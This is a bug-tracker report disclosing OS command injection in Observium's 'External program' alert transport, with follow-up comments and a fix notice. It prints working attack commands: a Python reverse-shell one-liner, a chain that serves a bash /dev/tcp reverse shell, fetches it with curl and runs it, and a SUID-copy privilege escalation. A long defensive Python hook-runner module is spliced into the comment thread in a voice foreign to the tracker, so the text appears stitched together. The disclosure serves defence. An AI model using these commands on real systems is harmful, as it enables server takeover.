
[Security] OS command injection in the "External program" transport

Details

    • Type: Bug
    • Resolution: Fixed
    • Priority: Major
    • Affects Version/s: None
    • Fix Version/s: CE-22.5
    • Component/s: Security, Web Interface
    • Labels: None

    Description

      Hello! I discovered the possibility of executing any OS commands through the "External program" transport. This functionality can allow a user with privilege level 10 to completely compromise the server. The exploitation of this vulnerability was tested on Observium CE 23.9.13005.

      CVSS 3.1: 7.2 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)

      Steps to reproduce the vulnerability:

      1. Create a contact with the "External program" transport. In the "External program path" field, insert the payload "curl YOUR_IP"
      2. Run the listener using netcat "sudo nc -lvnp 80"
      3. Create Alert Checkers and assign the contact created in step 1
      4. When an alert occurs, a curl request will be sent to your listener

      To execute a command, just paste it into this field; there is no need to use additional special characters, as in the screenshot above.

      The command specified in the "External program path" field will be executed as the user who is running Observium.

      The insecure design of this functionality jeopardizes the security of the server, since an attacker can specify a reverse shell as a command. This will allow him to access the server with the ability to execute any OS commands.

      For example, just insert this python3 command to get a reverse shell (you also need to set a listener):

      python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("IP",PORT));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")'

      Activity
          Melizzgh Melizzgh added a comment -

          @Mike Stupalov Hello! I took the time to look at the fixes.

          It seems to me that it is conceptually unsafe to allow the "External program" transport to allow OS commands to be executed, because the legal functionality of most commands can be abused. Despite the changes in version r13514, the current functionality still leads to compromise of the server.

          Example 1 - Remote reverse shell:

          Raise a web server with a bash script:

            python3 -m http.server

          1. Place a bash script with the following contents in the directory of the python web server:

            bash -c "bash -i >& /dev/tcp/YOUR_IP/5555 0>&1"

          2. Set a listener:

            nc -lvnp 5555

          3. Using the "External program" functionality, execute two commands sequentially:

            curl http://YOUR_IP:8000/shell.sh -o /tmp/shell.sh
            bash /tmp/shell.sh

          Example 2 - Local privilege escalation via SUID bit:

          Using the "External program" functionality, execute two commands sequentially:

            cp /bin/bash /tmp/shell_lpe
            chmod u+s /tmp/shell_lpe
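The comment above argues that a transport which executes whatever string an administrator types is unsafe by design, whatever filtering is applied to it. The following is an added example (not Observium's code, and not the r13514 fix) of the alternative design: the configured value is only the bare file name of an operator-installed hook inside a fixed directory, the file is checked before use (inside the directory after symlink resolution, regular, executable, not writable by the service account), and alert data reaches the hook as argv and environment variables, never as shell text. The hooks directory, the hook name, the alert fields and the ALERT_* variable names are all constructed for this demonstration.

```python
"""Constrained "external program" transport (added example, not Observium code).

The configured value is treated strictly as a file name in an allowlisted
directory, the file is validated, and it is executed without a shell. The
directory layout, hook name, alert fields and ALERT_* variables below are
constructed for this demonstration.
"""
import os
import shutil
import stat
import subprocess
import tempfile


class HookRejected(Exception):
    """Raised when the configured program fails the allowlist checks."""


def resolve_hook(configured_name: str, hooks_dir: str, required_owner=None) -> str:
    """Return the real path of an acceptable hook or raise HookRejected.

    The value is never parsed as a command line, so 'curl host' or
    'cp a b' cannot be expressed; it must name one file in hooks_dir.
    """
    hooks_root = os.path.realpath(hooks_dir)
    if not configured_name or configured_name != os.path.basename(configured_name):
        raise HookRejected("hook must be a bare file name, no directory components")
    real = os.path.realpath(os.path.join(hooks_root, configured_name))
    # realpath() follows symlinks, so a link pointing outside the directory fails here.
    if os.path.dirname(real) != hooks_root:
        raise HookRejected("hook resolves outside the hooks directory")
    try:
        st = os.stat(real)
    except FileNotFoundError:
        raise HookRejected("hook does not exist") from None
    if not stat.S_ISREG(st.st_mode):
        raise HookRejected("hook is not a regular file")
    if not os.access(real, os.X_OK):
        raise HookRejected("hook is not executable")
    # A hook the service account can rewrite is the /tmp/shell.sh pattern from
    # the comment above; refuse any write bit, and optionally demand a specific
    # owner (root in production; None here because the demo runs as an ordinary user).
    if st.st_mode & (stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH):
        raise HookRejected("hook must not be writable")
    if required_owner is not None and st.st_uid != required_owner:
        raise HookRejected("hook has the wrong owner")
    return real


def run_hook(hook_path: str, alert: dict, timeout: float = 10.0) -> subprocess.CompletedProcess:
    """Execute the hook directly (no shell); alert fields go via argv and env."""
    env = {"PATH": "/usr/bin:/bin"}
    env.update({"ALERT_" + key.upper(): str(value) for key, value in alert.items()})
    argv = [hook_path, str(alert.get("device", "")), str(alert.get("message", ""))]
    return subprocess.run(argv, env=env, capture_output=True, text=True,
                          timeout=timeout, check=False)


def build_demo_hooks_dir() -> str:
    """Create a throwaway hooks directory (constructed fixture for the demo)."""
    hooks_dir = tempfile.mkdtemp(prefix="hooks-demo-")
    hook = os.path.join(hooks_dir, "notify.sh")
    with open(hook, "w") as fh:
        fh.write('#!/bin/sh\nprintf "device=%s msg=%s\\n" "$1" "$ALERT_MESSAGE"\n')
    os.chmod(hook, 0o555)                      # executable, not writable
    with open(os.path.join(hooks_dir, "notes.txt"), "w") as fh:
        fh.write("not a program\n")            # regular file, not executable
    os.symlink("/bin/sh", os.path.join(hooks_dir, "escape"))  # link leaving the directory
    return hooks_dir


def run_demo() -> dict:
    """Feed several configured values through the checks and run the good one."""
    hooks_dir = build_demo_hooks_dir()
    results = {}
    try:
        for candidate in ("curl 10.0.0.1", "../../bin/sh", "/bin/bash",
                          "escape", "notes.txt", "notify.sh"):
            try:
                resolve_hook(candidate, hooks_dir)
                results[candidate] = "accepted"
            except HookRejected as err:
                results[candidate] = "rejected: " + str(err)
        # Shell metacharacters in alert data stay inert: they are argv/env values.
        alert = {"device": "core-rtr-1; id", "message": "$(id) link down"}
        proc = run_hook(resolve_hook("notify.sh", hooks_dir), alert)
        results["stdout"] = proc.stdout.strip()
    finally:
        shutil.rmtree(hooks_dir)
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key!r}: {value}")
```

Running the module shows every free-form value ("curl 10.0.0.1", a traversal, an absolute path, an escaping symlink, a non-executable data file) being rejected and only "notify.sh" being accepted; the hook's output contains the ";" and "$(...)" from the alert data verbatim, because nothing on the path to the hook ever interprets them as shell syntax. In a deployment the hooks directory and its contents should be owned by root and the `required_owner` check enabled, so that a compromise of the web service account cannot turn into a new hook.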


          landy Mike Stupalov added a comment -

          Fixed in r13514.
          Will be fixed in next CE release.

          People

            landy Mike Stupalov
            Melizzgh Melizzgh